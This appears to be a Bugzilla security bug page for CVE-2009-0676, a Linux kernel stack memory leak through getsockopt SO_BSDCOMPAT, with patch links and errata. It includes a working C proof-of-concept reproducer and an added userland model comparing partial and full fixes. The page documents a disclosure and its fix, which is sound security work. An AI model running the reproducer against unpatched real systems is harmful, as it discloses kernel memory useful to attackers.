Bug 486305 (CVE-2009-0676)

| Field | Value |
|---|---|
| Summary | CVE-2009-0676 kernel: memory disclosure in SO_BSDCOMPAT gsopt |
| Product | [Other] Security Response |
| Component | vulnerability |
| Status | CLOSED ERRATA |
| Severity | medium |
| Priority | medium |
| Version | unspecified |
| Reporter | Eugene Teo (Security Response) <eteo> |
| Assignee | Red Hat Product Security <security-response-team> |
| CC | anton, bhu, dhoward, jpirko, kseifried, lgoncalv, lwang, tao, vgoyal, williams |
| Keywords | Security |
| Hardware | All |
| OS | Linux |
| Doc Type | Bug Fix |
| Last Closed | 2011-09-30 23:36:24 UTC |
| Bug Depends On | 486514, 486515, 486516, 486517, 486518 |
Created attachment 332522: Upstream patch
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=df0bca049d01c0ee94afb7cd5dfd959541e6c8da

This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages.

    sock = socket(2, 2, 0);                                          /* AF_INET, SOCK_DGRAM */
    err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len);  /* check err and the bytes in buf */
SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname,
char __user *, optval, int __user *, optlen)
{
[...]
if (level == SOL_SOCKET)
err =
sock_getsockopt(sock, level, optname, optval,
optlen);
net: amend the fix for SO_BSDCOMPAT gsopt infoleak
http://marc.info/?l=linux-kernel&m=123540732700371&w=2
http://marc.info/?l=linux-netdev&m=123543237010175&w=2

(In reply to comment #4)
> net: amend the fix for SO_BSDCOMPAT gsopt infoleak
> http://marc.info/?l=linux-kernel&m=123540732700371&w=2
> http://marc.info/?l=linux-netdev&m=123543237010175&w=2

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=50fee1dec5d71b8a14c1b82f2f42e16adc227f8b

CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)

This issue has been addressed in the following products:
MRG for RHEL-5
Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html

This issue has been addressed in the following products:
Red Hat Enterprise Linux 5
Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html

This issue has been addressed in the following products:
Red Hat Enterprise Linux 4
Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html
From Clement Lecigne:

In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and directly returned in userland in case we have SO_BSDCOMPAT option set. This dummy code should trigger the bug:

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/socket.h>

    int main(void)
    {
        unsigned char buf[4] = { 0, 0, 0, 0 };
        socklen_t len = sizeof(buf);   /* must be initialised: the kernel rejects a negative optlen */
        int sock;

        sock = socket(33, 2, 2);       /* 33 = AF_RXRPC on Linux; any family works, the leak is in the generic SOL_SOCKET path */
        if (sock < 0) { perror("socket"); return 1; }
        if (getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, buf, &len) < 0) perror("getsockopt");
        printf("%02x%02x%02x%02x\n", buf[0], buf[1], buf[2], buf[3]);   /* unfixed kernel: 4 bytes of kernel stack */
        close(sock);
        return 0;
    }

References:
http://lkml.org/lkml/2009/2/11/374
http://lkml.org/lkml/2009/2/12/123
http://patchwork.kernel.org/patch/6816/
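The block below is an added example, not kernel source and not Clement's reproducer. It models the sock_getsockopt() pattern in ordinary userland C so that the leak can be shown deterministically: a union is filled per option and then copied out as a whole, and on the SO_BSDCOMPAT path nothing is ever written into it. It also compares two ways of closing the hole, zeroing only the int member versus memset() of the whole union; that contrast is my reading of why the first upstream commit needed the "amend the fix" follow-up linked above (this page gives only the commit title and URL, so treat that as an assumption). The MODEL_ option numbers, the padded model_timeval, the STALE marker and the caller-supplied stack slot are all constructed for the example, and memcpy() stands in for copy_to_user().

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins for the socket option numbers (values as in the x86 Linux ABI). */
#define MODEL_SO_KEEPALIVE  9
#define MODEL_SO_BSDCOMPAT 14
#define MODEL_SO_RCVTIMEO  20

/* A timeval with an 8-byte tv_sec and a 4-byte tv_usec: on 64-bit ABIs this is 16 bytes, 4 of them padding. */
struct model_timeval {
    int64_t tv_sec;
    int32_t tv_usec;
};

/* Same shape as the union that sock_getsockopt() fills and then copies to userland. */
union optval {
    int val;
    struct model_timeval tm;
};

enum fix_level {
    FIX_NONE,      /* as reported: nothing is written to v on the SO_BSDCOMPAT path        */
    FIX_VAL_ONLY,  /* v.val = 0 beforehand: clears sizeof(int) bytes, the rest stays stale  */
    FIX_MEMSET     /* memset(&v, 0, sizeof v) beforehand: clears every byte, padding too    */
};

#define STALE 0xA5  /* marker byte for what an earlier kernel frame left in the slot */

/* Number of padding bytes in model_timeval (4 on x86-64 and aarch64, 0 where int64_t is 4-byte aligned). */
int model_timeval_padding(void)
{
    return (int)(sizeof(struct model_timeval) - sizeof(int64_t) - sizeof(int32_t));
}

/*
 * Userland model of sock_getsockopt(). `v` is the stack slot the union would occupy;
 * the caller hands it in pre-filled so the result does not depend on real stack contents.
 * memcpy() stands in for copy_to_user(). Returns 0 or a negative errno like the kernel.
 */
static int model_getsockopt(enum fix_level fix, union optval *v, int optname,
                            int keepalive, int64_t rcvtimeo_sec,
                            unsigned char *optval, int *optlen)
{
    int lv = sizeof(int);
    int len = *optlen;

    if (len < 0)
        return -EINVAL;

    switch (fix) {
    case FIX_NONE:     break;
    case FIX_VAL_ONLY: v->val = 0; break;
    case FIX_MEMSET:   memset(v, 0, sizeof(*v)); break;
    }

    switch (optname) {
    case MODEL_SO_KEEPALIVE:
        v->val = keepalive;            /* every byte that will be copied out is written */
        break;
    case MODEL_SO_BSDCOMPAT:
        /* the kernel only logs "using obsolete getsockopt SO_BSDCOMPAT" here and writes nothing */
        break;
    case MODEL_SO_RCVTIMEO:
        lv = sizeof(struct model_timeval);
        v->tm.tv_sec = rcvtimeo_sec;   /* both members are written ...               */
        v->tm.tv_usec = 0;             /* ... but the struct's padding bytes are not  */
        break;
    default:
        return -ENOPROTOOPT;
    }

    if (len > lv)
        len = lv;
    memcpy(optval, v, len);            /* copy_to_user(optval, &v, len) in the kernel */
    *optlen = len;
    return 0;
}

/* Run one option under one fix level; return how many STALE bytes reached "userland", -1 on error. */
int leaked_bytes(enum fix_level fix, int optname)
{
    union optval slot;
    unsigned char out[sizeof(union optval)];
    int len = sizeof(out);
    int n = 0;

    memset(&slot, STALE, sizeof(slot));   /* constructed: what the previous frame left behind */
    memset(out, 0, sizeof(out));
    if (model_getsockopt(fix, &slot, optname, 1, 0x1234, out, &len) != 0)
        return -1;
    for (int i = 0; i < len; i++)
        if (out[i] == STALE)
            n++;
    return n;
}

int main(void)
{
    printf("SO_BSDCOMPAT unfixed   : %d stale bytes\n", leaked_bytes(FIX_NONE, MODEL_SO_BSDCOMPAT));
    printf("SO_BSDCOMPAT v.val = 0 : %d stale bytes\n", leaked_bytes(FIX_VAL_ONLY, MODEL_SO_BSDCOMPAT));
    printf("SO_RCVTIMEO  v.val = 0 : %d stale bytes (padding)\n", leaked_bytes(FIX_VAL_ONLY, MODEL_SO_RCVTIMEO));
    printf("SO_RCVTIMEO  memset    : %d stale bytes\n", leaked_bytes(FIX_MEMSET, MODEL_SO_RCVTIMEO));
    return 0;
}
```

Compile with `cc model.c && ./a.out`. The unfixed SO_BSDCOMPAT path hands all four copied bytes back untouched, which is exactly what the reproducer above prints on a vulnerable kernel. Zeroing v.val alone closes that path, but the timeval case shows why it is not a complete fix: the members get written, the padding does not, and copy_to_user() does not distinguish the two. Clearing the whole union before the switch is the only variant that leaks nothing regardless of which option is asked for.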